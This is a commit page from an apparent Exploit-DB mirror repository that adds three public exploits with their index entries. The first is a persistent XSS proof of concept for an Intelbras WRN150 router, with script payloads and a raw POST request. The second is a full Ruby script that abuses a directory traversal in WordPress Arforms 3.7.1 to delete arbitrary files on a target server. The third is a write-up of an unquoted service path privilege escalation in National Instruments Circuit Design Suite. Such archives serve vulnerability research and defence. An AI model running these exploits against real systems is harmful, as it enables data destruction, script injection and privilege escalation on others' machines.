bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-10-12

Browse source 
3 changes to exploits/shellcodes

National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation
Intelbras Router WRN150 1.0.18 - Persistent Cross-Site Scripting
WordPress Arforms 3.7.1 - Directory Traversal
This commit is contained in:
Offensive Security 2019-10-12 05:01:49 +00:00
parent c4b3e48aea
commit 2b52915f75
4 changed files with 336 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

39
exploits/hardware/webapps/47491.txt Normal file
View file

@ -0,0 +1,39 @@
# Exploit Title: Intelbras Router WRN150 1.0.18 - Persistent Cross-Site Scripting
# Date: 2019-10-03
# Exploit Author: Prof. Joas Antonio
# Vendor Homepage: https://www.intelbras.com/pt-br/
# Software Link: http://en.intelbras.com.br/node/25896
# Version: 1.0.18
# Tested on: Windows
# CVE : CVE-201917411
# PoC 1:
1) Login to your router
2) After signing in as WAN Settings
3) Select for PPPOE mode
4) In the Service Name and Server Name field, enter any of these payloads:
<script> alert ("Hacked") </script>
<script> alert (1) </script>
# PoC burp.txt
POST /goform/AdvSetWan HTTP/1.1
Host: TARGET
Content-Length: 281
Cache-Control: max-age=0
Origin: http://TARGET
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://TARGET/wan_connected.asp
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ecos_pw=bWFkYXJhMTIxMQ==2dw:language=pt
Connection: close

236
exploits/php/webapps/47492.rb Executable file
View file

@ -0,0 +1,236 @@
# Exploit Title: WordPress Arforms 3.7.1 - Directory Traversal
# Date: 2019-09-27
# Exploit Author: Ahmad Almorabea
# Updated version of the exploit can be found always at : http://almorabea.net/cve-2019-16902.txt
# Software Link: https://www.arformsplugin.com/documentation/changelog/
# Version: 3.7.1
# CVE ID: CVE-2019-16902
#**************Start Notes**************
# You can run the script by putting the script name and then the URL and the URL should have directory the Wordpress folders.
# Example : exploit.rb www.test.com, and the site should have the Wordpress folders in it such www.test.com/wp-contnet.
# Pay attention to the 3 numbers at the beginning maybe you need to change it in other types like in this script is 143.
# But maybe in other forms maybe it's different so you have to change it accordingly.
# This version of the software is applicable to path traversal attack so you can delete files if you knew the path such ../../ and so on
# There is a request file with this Script make sure to put it in the same folder.
#**************End Notes****************
#!/usr/bin/env ruby
require "net/http"
require 'colorize'
$host = ARGV[0] || ""
$session_id = ARGV[1] || "3c0e9a7edfa6682cb891f1c3df8a33ad"
def start_function ()
puts "It's a weird question to ask but let's start friendly I'm Arforms exploit, what's your name?".yellow
name = STDIN.gets
if $host == ""
puts "What are you doing #{name} where is the URL so we can launch the attack, please pay more attention buddy".red
exit
end
check_existence_arform_folder
execute_deletion_attack
puts "Done ... see ya " + name
end
def send_checks(files_names)
j = 1
while j <= files_names.length-1
uri = URI.parse("http://#{$host}/wp-content/uploads/arforms/userfiles/"+files_names[j])
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS
request = Net::HTTP::Get.new(uri.request_uri)
request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"
request["Connection"] = "keep-alive"
request["Accept-Language"] = "en-US,en;q=0.5"
request["Accept-Encoding"] = "gzip, deflate"
request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
begin
response = http.request(request).code
puts "The File " + files_names[j] + " has the response code of " + response
rescue Exception => e
puts "[!] Failed!"
puts e
end
j = j+1
end
end
def check_existence_arform_folder ()
path_array = ["/wp-plugins/arforms","/wp-content/uploads/arforms/userfiles"]
$i = 0
results = []
while $i <= path_array.length-1
uri = URI.parse("http://#{$host}/#{path_array[$i]}")
#puts uri
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS
request = Net::HTTP::Get.new(uri.request_uri)
response = http.request(request)
results[$i] = response.code
#puts"response code is : " + response.code
$i +=1
end
puts "****************************************************"
if results[0] == "200" || results[0] =="301"
puts "The Plugin is Available on the following path : ".green + $host + path_array[0]
else
puts "We couldn't locate the Plugin in this path, you either change the path or we can't perform the attack, Simple Huh?".red
exit
end
if (results[1] == "200" || results[1] == "301")
puts "The User Files folder is Available on the following path : ".green + $host + path_array[1]
else
puts "We couldn't find the User Files folder, on the following path ".red + $host + path_array[1]
end
puts "****************************************************"
end
def execute_deletion_attack ()
puts "How many file you want to delete my man"
amount = STDIN.gets.chomp.to_i
if(amount == 0)
puts "You can't use 0 or other strings this input for the amount of file you want to delete so it's an Integer".blue
exit
end
file_names = []
file_names[0] = "143_772_1569713145702_temp3.txt"
j = 1
while j <= amount.to_i
puts "Name of the file number " + j.to_s
file_names[j] = STDIN.gets
file_names[j].strip!
j = j+1
end
uri = URI.parse("http://#{$host}")
#puts uri
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true if uri.scheme == 'https'
request = Net::HTTP::Get.new(uri.request_uri)
response = http.request(request)
global_cookie = response.response['set-cookie'] + "; PHPSESSID="+$session_id #Assign the session cookie
$i = 0
while $i <= file_names.length-1
puts "Starting the Attack Journey .. ".green
uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php")
headers =
{
'Referer' => 'From The Sky',
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
'Content-Type' => 'multipart/form-data; boundary=---------------------------14195989911851978808724573615',
'Accept-Encoding' => 'gzip, deflate',
'Cookie' => global_cookie,
'X_FILENAME' => file_names[$i],
'X-FILENAME' => file_names[$i],
'Connection' => 'close'
}
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true if uri.scheme == 'https'
request = Net::HTTP::Post.new(uri.path, headers)
request.body = File.read("post_file")
response = http.request request
$i = $i +1
end
execute_delete_request file_names,global_cookie,amount.to_i
puts "Finished.........."
end
def execute_delete_request (file_names,cookies,rounds )
$i = 0
while $i <= file_names.length-1
puts "Starting the Attack on file No #{$i.to_s} ".green
uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php")
headers =
{
'Referer' => 'From The Sky',
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
'Accept' => '*/*',
'Accept-Language' => 'en-US,en;q=0.5',
'X-Requested-With'=> 'XMLHttpRequest',
'Cookie' => cookies,
'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8',
'Accept-Encoding' => 'gzip, deflate',
'Connection' => 'close'
}
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true if uri.scheme == 'https'
request = Net::HTTP::Post.new(uri.path,headers)
request.body = "action=arf_delete_file&file_name="+file_names[$i]+"&form_id=143"
response = http.request(request)
if $i != 0
puts "File Name requested to delete is : " + file_names[$i] + " has the Response Code of " + response.code
end
$i = $i +1
end
send_checks file_names
end
start_function()

58
exploits/windows/local/47490.txt Normal file
View file

@ -0,0 +1,58 @@
# Exploit Title: National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation
# Discovery Date: 2019-10-10
# Exploit Author: Ivan Marmolejo
# Vendor Homepage: http://www.ni.com/en-us.html
# Software Link: https://www.ni.com/en-us/shop/select/circuit-design-suite
# Version: 14.0
# Vulnerability Type: Local
# Tested on: Windows 10 Pro x64 Esp
# Version: 10.0.18362
# Exploit.txt
##############################################################################################################################################
Summary: Circuit Design Suite combines Multisim and Ultiboard software to offer a complete set of tools for circuit design,simulation,
validation and design. Circuit Design Suite helps you design circuits with intuitive and cost-effective tools. You can perform an interactive
SPICE simulation and make a perfect transition to PCB design and routing software. Built for education, research and design, the suite offers
advanced simulation capabilities to give you a clear view of how circuits perform in any situation.
Description: The application suffers from an unquoted search path issue impacting the service 'NiSvcLoc'. This could potentially allow an
authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require
the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could
potentially be executed during application startup or reboot. If successful, the local users code would execute with the elevated privileges
of the application.
##############################################################################################################################################
Step to discover the unquoted Service:
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
NI Service Locator NiSvcLoc C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s Auto
##############################################################################################################################################
Service info:
C:\Users\user>sc qc NiSvcLoc
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: NiSvcLoc
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : NI Service Locator
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
##############################################################################################################################################

3
files_exploits.csv
View file

@ -10712,6 +10712,7 @@ id,file,description,date,author,type,platform,port
47471,exploits/windows/local/47471.txt,"CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation",2019-10-07,"Jakub Palaczynski",local,windows,
47477,exploits/windows/local/47477.py,"DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)",2019-10-09,"Alessandro Magnosi",local,windows,
47482,exploits/linux/local/47482.rb,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (Metasploit_ DEP Bypass)",2019-10-10,max7253,local,linux,
47490,exploits/windows/local/47490.txt,"National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation",2019-10-11,"Ivan Marmolejo",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -41819,3 +41820,5 @@ id,file,description,date,author,type,platform,port
47475,exploits/php/webapps/47475.php,"vBulletin 5.0 < 5.5.4 - 'updateAvatar' Authenticated Remote Code Execution",2019-10-07,EgiX,webapps,php,
47480,exploits/hardware/webapps/47480.txt,"SMA Solar Technology AG Sunny WebBox device - 1.6 - Cross-Site Request Forgery",2019-10-10,"Borja Merino",webapps,hardware,80
47483,exploits/hardware/webapps/47483.py,"TP-Link TL-WR1043ND 2 - Authentication Bypass",2019-10-10,"Uriel Kosayev",webapps,hardware,80
47491,exploits/hardware/webapps/47491.txt,"Intelbras Router WRN150 1.0.18 - Persistent Cross-Site Scripting",2019-10-11,"Prof. Joas Antonio",webapps,hardware,
47492,exploits/php/webapps/47492.rb,"WordPress Arforms 3.7.1 - Directory Traversal",2019-10-11,"Ahmad Almorabea",webapps,php,

Can't render this file because it is too large.